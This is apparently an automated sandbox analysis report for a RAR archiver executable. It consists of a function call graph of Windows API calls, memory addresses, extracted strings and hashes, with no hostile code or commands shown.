7ff6ee736c64 130 API calls _UnwindNestedFrames 39180->39415 39182->38999 39183->38992 39184->38994 39185->39002 39186->39005 39187->39003 39188->39122 39190 7ff6ee7332e9 39189->39190 39191 7ff6ee733231 39189->39191 39190->39142 39191->39190 39238 7ff6ee744380 14 API calls 39191->39238 39193 7ff6ee73329c 39193->39190 39239 7ff6ee752a20 22 API calls 2 library calls 39193->39239 39196 7ff6ee7470a4 39195->39196 39197 7ff6ee7470c5 39196->39197 39240 7ff6ee758558 10 API calls 2 library calls 39196->39240 39197->39142 39241 7ff6ee736714 39199->39241 39201 7ff6ee736836 39202 7ff6ee736853 39201->39202 39252 7ff6ee7948c0 31 API calls _invalid_parameter_noinfo 39201->39252 39202->39142 39204 7ff6ee73684b 39204->39202 39205 7ff6ee7368a9 std::bad_alloc::bad_alloc 39204->39205 39253 7ff6ee78ba34 RtlPcToFileHeader RaiseException 39205->39253 39207 7ff6ee7368c4 39254 7ff6ee737188 12 API calls 39207->39254 39209 7ff6ee7368eb 39209->39142 39211 7ff6ee777a4f 39210->39211 39216 7ff6ee777a59 39210->39216 39211->39142 39212 7ff6ee777b1c 60 API calls 39212->39216 39213 7ff6ee777a7c 39291 7ff6ee77b6d0 73 API calls _Init_thread_footer 39213->39291 39216->39211 39216->39212 39216->39213 39259 7ff6ee7771fc 39216->39259 39292 7ff6ee7441b0 14 API calls 2 library calls 39216->39292 39219 7ff6ee736ee6 39218->39219 39224 7ff6ee736f5c 39218->39224 39340 7ff6ee779f64 8 API calls memcpy_s 39219->39340 39221 7ff6ee736efb 39222 7ff6ee736f2f 39221->39222 39221->39224 39222->39221 39341 7ff6ee737188 12 API calls 39222->39341 39224->39134 39226 7ff6ee776f8a 39225->39226 39227 7ff6ee776fb4 39225->39227 39226->39227 39228 7ff6ee754538 FindClose 39226->39228 39228->39226 39230 7ff6ee735742 39229->39230 39232 7ff6ee73575d 39229->39232 39230->39232 39346 7ff6ee763520 12 API calls 2 library calls 39230->39346 39342 7ff6ee763610 39232->39342 39234 7ff6ee7357fc 39234->39142 39236 7ff6ee7648bc 8 API calls 39236->39234 39237->39142 39238->39193 39239->39190 39240->39196 39242 7ff6ee736738 39241->39242 39251 7ff6ee7367a7 memcpy_s 39241->39251 39243 7ff6ee736765 39242->39243 39255 7ff6ee74ca6c 48 API calls 2 library calls 39242->39255 39244 7ff6ee736786 39243->39244 39245 7ff6ee7367e1 39243->39245 39244->39251 39257 7ff6ee74cb64 8 API calls 39244->39257 39245->39251 39258 7ff6ee74cb64 8 API calls 39245->39258 39247 7ff6ee736759 39256 7ff6ee74cb64 8 API calls 39247->39256 39251->39201 39252->39204 39253->39207 39254->39209 39255->39247 39264 7ff6ee777217 setbuf 39259->39264 39261 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39263 7ff6ee77776f 39261->39263 39263->39216 39274 7ff6ee77729c 39264->39274 39283 7ff6ee77725a 39264->39283 39285 7ff6ee7773c5 39264->39285 39300 7ff6ee754554 39264->39300 39265 7ff6ee777453 39267 7ff6ee777476 39265->39267 39268 7ff6ee777464 39265->39268 39286 7ff6ee777496 39267->39286 39297 7ff6ee754538 39267->39297 39308 7ff6ee777c38 55 API calls 3 library calls 39268->39308 39270 7ff6ee777342 39270->39283 39287 7ff6ee777656 39270->39287 39290 7ff6ee7776ef 39270->39290 39309 7ff6ee744380 14 API calls 39270->39309 39271 7ff6ee777471 39271->39267 39275 7ff6ee7773bb 39274->39275 39277 7ff6ee77732e 39274->39277 39278 7ff6ee78a444 new 4 API calls 39275->39278 39277->39270 39279 7ff6ee77734a 39277->39279 39278->39285 39280 7ff6ee77737e 39279->39280 39279->39283 39306 7ff6ee744380 14 API calls 39279->39306 39280->39283 39307 7ff6ee74cbd0 75 API calls 39280->39307 39281 7ff6ee754554 16 API calls 39281->39283 39283->39261 39293 7ff6ee7545cc 39285->39293 39286->39281 39286->39283 39287->39283 39287->39287 39288 7ff6ee777723 39287->39288 39287->39290 39310 7ff6ee73c214 8 API calls 2 library calls 39288->39310 39290->39283 39311 7ff6ee758558 10 API calls 2 library calls 39290->39311 39292->39216 39294 7ff6ee7545ed 39293->39294 39295 7ff6ee7546ec 15 API calls 39294->39295 39296 7ff6ee7546b2 39294->39296 39295->39294 39296->39265 39296->39270 39298 7ff6ee754549 FindClose 39297->39298 39299 7ff6ee75454f 39297->39299 39298->39299 39299->39286 39301 7ff6ee754570 39300->39301 39302 7ff6ee754574 39301->39302 39312 7ff6ee7546ec 39301->39312 39302->39274 39305 7ff6ee75458d FindClose 39305->39302 39306->39280 39307->39283 39308->39271 39309->39287 39310->39283 39311->39283 39313 7ff6ee754705 setbuf 39312->39313 39314 7ff6ee754733 FindFirstFileW 39313->39314 39315 7ff6ee7547a4 FindNextFileW 39313->39315 39316 7ff6ee754749 39314->39316 39324 7ff6ee75478b 39314->39324 39317 7ff6ee7547ae GetLastError 39315->39317 39315->39324 39325 7ff6ee764534 39316->39325 39317->39324 39320 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39323 7ff6ee754587 39320->39323 39321 7ff6ee75477a GetLastError 39321->39324 39322 7ff6ee75475f FindFirstFileW 39322->39321 39322->39324 39323->39302 39323->39305 39324->39320 39326 7ff6ee764549 setbuf 39325->39326 39336 7ff6ee7645a2 39326->39336 39337 7ff6ee76472c CharUpperW 39326->39337 39328 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39330 7ff6ee75475b 39328->39330 39329 7ff6ee764579 39338 7ff6ee764760 CharUpperW 39329->39338 39330->39321 39330->39322 39332 7ff6ee764592 39333 7ff6ee76459a 39332->39333 39334 7ff6ee764629 GetCurrentDirectoryW 39332->39334 39339 7ff6ee76472c CharUpperW 39333->39339 39334->39336 39336->39328 39337->39329 39338->39332 39339->39336 39340->39221 39341->39222 39343 7ff6ee763626 setbuf wcschr 39342->39343 39344 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39343->39344 39345 7ff6ee7357e1 39344->39345 39345->39234 39345->39236 39346->39232 39348 7ff6ee748919 39347->39348 39373 7ff6ee774b14 39348->39373 39350 7ff6ee748954 memcpy_s 39350->39147 39352 7ff6ee769199 39351->39352 39353 7ff6ee78a480 4 API calls 39352->39353 39354 7ff6ee7691be 39353->39354 39355 7ff6ee78a444 new 4 API calls 39354->39355 39356 7ff6ee7691cf 39355->39356 39357 7ff6ee7691e1 39356->39357 39358 7ff6ee7488dc 8 API calls 39356->39358 39359 7ff6ee78a444 new 4 API calls 39357->39359 39358->39357 39360 7ff6ee7691f7 39359->39360 39361 7ff6ee769209 39360->39361 39362 7ff6ee7488dc 8 API calls 39360->39362 39361->39149 39362->39361 39364 7ff6ee7488dc 8 API calls 39363->39364 39365 7ff6ee767063 39364->39365 39366 7ff6ee7672c0 4 API calls 39365->39366 39367 7ff6ee737325 39366->39367 39367->39152 39367->39155 39378 7ff6ee777d80 39368->39378 39374 7ff6ee774b2b 39373->39374 39375 7ff6ee774b26 39373->39375 39374->39350 39377 7ff6ee774b38 8 API calls _UnwindNestedFrames 39375->39377 39377->39374 39385 7ff6ee778094 39378->39385 39381 7ff6ee758a44 39382 7ff6ee758a5a memcpy_s 39381->39382 39389 7ff6ee77bac4 39382->39389 39386 7ff6ee77809f 39385->39386 39387 7ff6ee777ec8 68 API calls 39386->39387 39388 7ff6ee75896e 39387->39388 39388->39381 39392 7ff6ee77ba70 GetCurrentProcess GetProcessAffinityMask 39389->39392 39393 7ff6ee7589c5 39392->39393 39393->39155 39395 7ff6ee769245 39394->39395 39402 7ff6ee756194 39395->39402 39397 7ff6ee7692b1 39398 7ff6ee756194 72 API calls 39397->39398 39399 7ff6ee7692bd 39398->39399 39400 7ff6ee756194 72 API calls 39399->39400 39401 7ff6ee7692c9 39400->39401 39403 7ff6ee7561b4 39402->39403 39406 7ff6ee7561cb 39402->39406 39407 7ff6ee77b850 72 API calls 39403->39407 39406->39397 39408->39166 39409->39167 39410->39171 39411->39175 39412->39164 39413->39168 39414->39165 39415->39179 39416 7ff6ee77bb70 39419 7ff6ee77bb80 39416->39419 39428 7ff6ee77bae8 39419->39428 39421 7ff6ee77bb79 39422 7ff6ee77bb97 39422->39421 39433 7ff6ee741690 39422->39433 39424 7ff6ee77bbc8 SetEvent 39425 7ff6ee77bbd5 LeaveCriticalSection 39424->39425 39426 7ff6ee77bae8 67 API calls 39425->39426 39426->39422 39437 7ff6ee77b974 WaitForSingleObject 39428->39437 39431 7ff6ee77bb16 EnterCriticalSection LeaveCriticalSection 39432 7ff6ee77bb12 39431->39432 39432->39422 39434 7ff6ee7416a4 39433->39434 39435 7ff6ee7416c2 EnterCriticalSection 39433->39435 39434->39435 39445 7ff6ee741180 39434->39445 39435->39424 39435->39425 39438 7ff6ee77b9b7 39437->39438 39439 7ff6ee77b986 GetLastError 39437->39439 39438->39431 39438->39432 39443 7ff6ee74ca6c 48 API calls 2 library calls 39439->39443 39441 7ff6ee77b9a6 39444 7ff6ee74ca40 61 API calls _CxxThrowException 39441->39444 39443->39441 39444->39438 39446 7ff6ee7411ab 39445->39446 39454 7ff6ee7411b0 39445->39454 39455 7ff6ee7417c8 39446->39455 39448 7ff6ee74166a 39448->39434 39449 7ff6ee766d38 216 API calls 39449->39454 39450 7ff6ee766fe8 216 API calls 39450->39454 39451 7ff6ee741080 48 API calls 39451->39454 39452 7ff6ee766e90 216 API calls 39452->39454 39453 7ff6ee7417c8 216 API calls 39453->39454 39454->39448 39454->39449 39454->39450 39454->39451 39454->39452 39454->39453 39457 7ff6ee741813 memcpy_s 39455->39457 39465 7ff6ee758328 39457->39465 39458 7ff6ee766fe8 216 API calls 39459 7ff6ee74192f 39458->39459 39459->39458 39463 7ff6ee7419db 39459->39463 39460 7ff6ee741b27 39461 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39460->39461 39462 7ff6ee741b33 39461->39462 39462->39454 39463->39460 39464 7ff6ee766fe8 216 API calls 39463->39464 39464->39463 39466 7ff6ee75834c setbuf 39465->39466 39471 7ff6ee7581bc 39466->39471 39468 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39469 7ff6ee75853b 39468->39469 39469->39459 39470 7ff6ee7583ab memcpy_s 39470->39468 39472 7ff6ee7581d8 memcpy_s setbuf 39471->39472 39472->39472 39473 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39472->39473 39474 7ff6ee75830c 39473->39474 39474->39470 39475 7ff6ee78b0fc 39496 7ff6ee78aa8c 39475->39496 39479 7ff6ee78b123 __scrt_acquire_startup_lock 39480 7ff6ee78b148 39479->39480 39556 7ff6ee78b52c 7 API calls memcpy_s 39479->39556 39485 7ff6ee78b18a __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39480->39485 39504 7ff6ee79472c 39480->39504 39486 7ff6ee78b1f7 39485->39486 39557 7ff6ee792574 35 API calls __InternalCxxFrameHandler 39485->39557 39512 7ff6ee793fc4 39486->39512 39493 7ff6ee78b220 39558 7ff6ee78ac64 8 API calls 2 library calls 39493->39558 39495 7ff6ee78b16d 39497 7ff6ee78aaae __isa_available_init 39496->39497 39559 7ff6ee78e2f8 39497->39559 39502 7ff6ee78aab7 39502->39479 39555 7ff6ee78b52c 7 API calls memcpy_s 39502->39555 39506 7ff6ee794744 39504->39506 39505 7ff6ee78b169 39505->39495 39508 7ff6ee7946b4 39505->39508 39506->39505 39608 7ff6ee792710 39506->39608 39509 7ff6ee79470f 39508->39509 39510 7ff6ee7946f0 39508->39510 39509->39485 39510->39509 39629 7ff6ee78b0e0 39510->39629 39513 7ff6ee78b20c 39512->39513 39514 7ff6ee793fd4 39512->39514 39516 7ff6ee767e20 39513->39516 39637 7ff6ee793c84 54 API calls 39514->39637 39638 7ff6ee77b470 GetModuleHandleW 39516->39638 39522 7ff6ee767e58 SetErrorMode GetModuleHandleW 39523 7ff6ee7748cc 21 API calls 39522->39523 39524 7ff6ee767e7d 39523->39524 39525 7ff6ee773e48 137 API calls 39524->39525 39526 7ff6ee767e90 39525->39526 39527 7ff6ee743d3c 126 API calls 39526->39527 39528 7ff6ee767e9c 39527->39528 39529 7ff6ee78a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39528->39529 39530 7ff6ee767ead 39529->39530 39531 7ff6ee767ebf 39530->39531 39532 7ff6ee743f18 70 API calls 39530->39532 39533 7ff6ee744d1c 157 API calls 39531->39533 39532->39531 39534 7ff6ee767ed6 39533->39534 39535 7ff6ee767eef 39534->39535 39536 7ff6ee746ad0 154 API calls 39534->39536 39537 7ff6ee744d1c 157 API calls 39535->39537 39538 7ff6ee767ee7 39536->39538 39539 7ff6ee767eff 39537->39539 39540 7ff6ee744e48 160 API calls 39538->39540 39541 7ff6ee767f0d 39539->39541 39543 7ff6ee767f14 39539->39543 39540->39535 39542 7ff6ee77b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39541->39542 39542->39543 39544 7ff6ee744888 58 API calls 39543->39544 39545 7ff6ee767f57 39544->39545 39546 7ff6ee744fd0 268 API calls 39545->39546 39547 7ff6ee767f5f 39546->39547 39548 7ff6ee767f9e 39547->39548 39549 7ff6ee767f8c 39547->39549 39553 7ff6ee78b684 GetModuleHandleW 39548->39553 39550 7ff6ee77b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39549->39550 39551 7ff6ee767f93 39550->39551 39551->39548 39552 7ff6ee77b57c 14 API calls 39551->39552 39552->39548 39554 7ff6ee78b698 39553->39554 39554->39493 39555->39479 39556->39480 39557->39486 39558->39495 39560 7ff6ee78e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39559->39560 39572 7ff6ee78eb08 39560->39572 39563 7ff6ee78aab3 39563->39502 39567 7ff6ee7945e4 39563->39567 39565 7ff6ee78e318 39565->39563 39579 7ff6ee78eb50 DeleteCriticalSection 39565->39579 39569 7ff6ee799d4c 39567->39569 39568 7ff6ee78aac0 39568->39502 39571 7ff6ee78e32c 8 API calls 3 library calls 39568->39571 39569->39568 39596 7ff6ee7966c0 39569->39596 39571->39502 39573 7ff6ee78eb10 39572->39573 39575 7ff6ee78eb41 39573->39575 39577 7ff6ee78e30b 39573->39577 39580 7ff6ee78e678 39573->39580 39585 7ff6ee78eb50 DeleteCriticalSection 39575->39585 39577->39563 39578 7ff6ee78e8a4 8 API calls 3 library calls 39577->39578 39578->39565 39579->39563 39586 7ff6ee78e34c 39580->39586 39583 7ff6ee78e6cf InitializeCriticalSectionAndSpinCount 39584 7ff6ee78e6bb 39583->39584 39584->39573 39585->39577 39587 7ff6ee78e3b2 39586->39587 39589 7ff6ee78e3ad 39586->39589 39587->39583 39587->39584 39588 7ff6ee78e3e5 LoadLibraryExW 39588->39589 39591 7ff6ee78e40b GetLastError 39588->39591 39589->39587 39589->39588 39592 7ff6ee78e47a 39589->39592 39595 7ff6ee78e458 FreeLibrary 39589->39595 39590 7ff6ee78e489 GetProcAddress 39590->39587 39593 7ff6ee78e4a1 39590->39593 39591->39589 39594 7ff6ee78e416 LoadLibraryExW 39591->39594 39592->39587 39592->39590 39593->39587 39594->39589 39595->39589 39607 7ff6ee796938 EnterCriticalSection 39596->39607 39598 7ff6ee7966d0 39599 7ff6ee798050 32 API calls 39598->39599 39601 7ff6ee7966d9 39599->39601 39600 7ff6ee7966e7 39603 7ff6ee796998 fflush LeaveCriticalSection 39600->39603 39601->39600 39602 7ff6ee7964d0 34 API calls 39601->39602 39604 7ff6ee7966e2 39602->39604 39605 7ff6ee7966f3 39603->39605 39606 7ff6ee7965bc GetStdHandle GetFileType 39604->39606 39605->39569 39606->39600 39609 7ff6ee79273a 39608->39609 39620 7ff6ee794b14 39609->39620 39612 7ff6ee794a74 __free_lconv_num 15 API calls 39613 7ff6ee792767 39612->39613 39614 7ff6ee794b14 __vcrt_getptd_noexit 15 API calls 39613->39614 39618 7ff6ee792791 39613->39618 39616 7ff6ee792783 39614->39616 39617 7ff6ee794a74 __free_lconv_num 15 API calls 39616->39617 39617->39618 39619 7ff6ee79279a 39618->39619 39627 7ff6ee796db4 6 API calls __vcrt_uninitialize_ptd 39618->39627 39619->39506 39625 7ff6ee794b25 __vcrt_getptd_noexit 39620->39625 39621 7ff6ee794b5a RtlAllocateHeap 39623 7ff6ee792759 39621->39623 39621->39625 39622 7ff6ee794b76 39628 7ff6ee794f3c 15 API calls memcpy_s 39622->39628 39623->39612 39625->39621 39625->39622 39626 7ff6ee7936c0 new 2 API calls 39625->39626 39626->39625 39627->39618 39628->39623 39636 7ff6ee78b6d8 SetUnhandledExceptionFilter 39629->39636 39637->39513 39639 7ff6ee767e45 39638->39639 39640 7ff6ee77b496 GetProcAddress 39638->39640 39643 7ff6ee747a68 39639->39643 39641 7ff6ee77b4cb GetProcAddress 39640->39641 39642 7ff6ee77b4ae 39640->39642 39641->39639 39642->39641 39644 7ff6ee747a76 39643->39644 39664 7ff6ee792ae4 39644->39664 39646 7ff6ee747a80 39647 7ff6ee792ae4 setbuf 60 API calls 39646->39647 39648 7ff6ee747a94 39647->39648 39673 7ff6ee747b44 GetStdHandle GetFileType 39648->39673 39651 7ff6ee747b44 3 API calls 39652 7ff6ee747aae 39651->39652 39653 7ff6ee747b44 3 API calls 39652->39653 39655 7ff6ee747abe 39653->39655 39654 7ff6ee747b12 39663 7ff6ee74cd78 SetConsoleCtrlHandler 39654->39663 39657 7ff6ee747aeb 39655->39657 39676 7ff6ee792abc 31 API calls 2 library calls 39655->39676 39657->39654 39678 7ff6ee792abc 31 API calls 2 library calls 39657->39678 39658 7ff6ee747adf 39677 7ff6ee792b40 33 API calls 3 library calls 39658->39677 39661 7ff6ee747b06 39679 7ff6ee792b40 33 API calls 3 library calls 39661->39679 39665 7ff6ee792ae9 39664->39665 39666 7ff6ee797ee8 39665->39666 39669 7ff6ee797f23 39665->39669 39680 7ff6ee794f3c 15 API calls memcpy_s 39666->39680 39668 7ff6ee797eed 39681 7ff6ee794e1c 31 API calls _invalid_parameter_noinfo 39668->39681 39682 7ff6ee797d98 60 API calls 2 library calls 39669->39682 39672 7ff6ee797ef8 39672->39646 39674 7ff6ee747b61 GetConsoleMode 39673->39674 39675 7ff6ee747a9e 39673->39675 39674->39675 39675->39651 39676->39658 39677->39657 39678->39661 39679->39654 39680->39668 39681->39672 39682->39672 39683 7ff6ee79231c 39684 7ff6ee792342 GetModuleHandleW 39683->39684 39685 7ff6ee79238c 39683->39685 39684->39685 39692 7ff6ee79234f 39684->39692 39700 7ff6ee796938 EnterCriticalSection 39685->39700 39687 7ff6ee79243b 39688 7ff6ee796998 fflush LeaveCriticalSection 39687->39688 39689 7ff6ee792460 39688->39689 39691 7ff6ee79246c 39689->39691 39695 7ff6ee792488 11 API calls 39689->39695 39690 7ff6ee792410 39693 7ff6ee792428 39690->39693 39697 7ff6ee7946b4 32 API calls 39690->39697 39692->39685 39701 7ff6ee7924d4 GetModuleHandleExW 39692->39701 39698 7ff6ee7946b4 32 API calls 39693->39698 39694 7ff6ee7943b8 16 API calls 39694->39690 39695->39691 39697->39693 39698->39687 39699 7ff6ee792396 39699->39687 39699->39690 39699->39694 39702 7ff6ee7924fe GetProcAddress 39701->39702 39703 7ff6ee792525 39701->39703 39702->39703 39704 7ff6ee792518 39702->39704 39705 7ff6ee79252f FreeLibrary 39703->39705 39706 7ff6ee792535 39703->39706 39704->39703 39705->39706 39706->39685 39707 7ff6ee733b53 39708 7ff6ee733b64 39707->39708 39757 7ff6ee751e80 39708->39757 39709 7ff6ee733c09 39769 7ff6ee7523f0 39709->39769 39711 7ff6ee733c18 39774 7ff6ee738050 157 API calls 39711->39774 39712 7ff6ee733bb6 39712->39709 39712->39711 39715 7ff6ee733c01 39712->39715 39714 7ff6ee733c90 39784 7ff6ee77d400 48 API calls 39714->39784 39717 7ff6ee751c24 12 API calls 39715->39717 39716 7ff6ee733c3d 39775 7ff6ee738010 13 API calls 39716->39775 39717->39709 39719 7ff6ee733ccc 39719->39714 39782 7ff6ee752414 61 API calls 39719->39782 39720 7ff6ee733c45 39723 7ff6ee733c54 39720->39723 39776 7ff6ee74cba8 75 API calls 39720->39776 39777 7ff6ee73a9d4 186 API calls wcschr 39723->39777 39724 7ff6ee733cf9 39783 7ff6ee751998 138 API calls 39724->39783 39728 7ff6ee733c5c 39778 7ff6ee7393ac 8 API calls 39728->39778 39729 7ff6ee733d10 39731 7ff6ee7518ac 15 API calls 39729->39731 39731->39714 39732 7ff6ee733c66 39733 7ff6ee733c77 39732->39733 39779 7ff6ee74ca40 61 API calls _CxxThrowException 39732->39779 39780 7ff6ee738090 8 API calls 39733->39780 39737 7ff6ee733c7f 39737->39714 39781 7ff6ee74ca40 61 API calls _CxxThrowException 39737->39781 39758 7ff6ee751e95 setbuf 39757->39758 39759 7ff6ee751ecb CreateFileW 39758->39759 39760 7ff6ee751f59 GetLastError 39759->39760 39761 7ff6ee751fb8 39759->39761 39762 7ff6ee764534 10 API calls 39760->39762 39763 7ff6ee751fd9 SetFileTime 39761->39763 39765 7ff6ee751ff7 39761->39765 39764 7ff6ee751f74 39762->39764 39763->39765 39764->39761 39767 7ff6ee751f78 CreateFileW GetLastError 39764->39767 39766 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39765->39766 39768 7ff6ee75203a 39766->39768 39767->39761 39768->39712 39785 7ff6ee7524e8 39769->39785 39772 7ff6ee75240e 39772->39719 39774->39716 39775->39720 39777->39728 39778->39732 39779->39733 39780->39737 39781->39714 39782->39724 39783->39729 39791 7ff6ee751af0 39785->39791 39788 7ff6ee7523f9 39788->39772 39790 7ff6ee74ca40 61 API calls _CxxThrowException 39788->39790 39790->39772 39792 7ff6ee751b01 setbuf 39791->39792 39793 7ff6ee751b6f CreateFileW 39792->39793 39794 7ff6ee751b68 39792->39794 39793->39794 39795 7ff6ee764534 10 API calls 39794->39795 39797 7ff6ee751be1 39794->39797 39796 7ff6ee751bb3 39795->39796 39796->39797 39798 7ff6ee751bb7 CreateFileW 39796->39798 39799 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39797->39799 39798->39797 39800 7ff6ee751c14 39799->39800 39800->39788 39801 7ff6ee74ca08 10 API calls 39800->39801 39801->39788

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FF6EE7454C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                      • API String ID: 0-1628410872
                                                                                                                                                                      • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                      • Instruction ID: 6e1dde0df9ed8f5b1783e6a3c8e388e799251ecd57c159bc9482710f1cd15309
                                                                                                                                                                      • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                      • Instruction Fuzzy Hash: 46C2C363A0C59281EF24DE64D0443BD26A1EB21784F574036EA0EC62C5DEFFE966C35B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE731884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                      • API String ID: 0-1660254149
                                                                                                                                                                      • Opcode ID: b8cb1c8fb26abeda722d0fd2213bcde0153c5d502918ca5fc30dbf398b96c1a4
                                                                                                                                                                      • Instruction ID: 69169f29cc68de7b1e2f00c09f8d82cd25782b55699c90de2523bef034ba936a
                                                                                                                                                                      • Opcode Fuzzy Hash: b8cb1c8fb26abeda722d0fd2213bcde0153c5d502918ca5fc30dbf398b96c1a4
                                                                                                                                                                      • Instruction Fuzzy Hash: BBE2E223A09AC285EF60DF25D8483FD27A1FB65788F460031EA4D87796DFBAD564C306
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7748CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
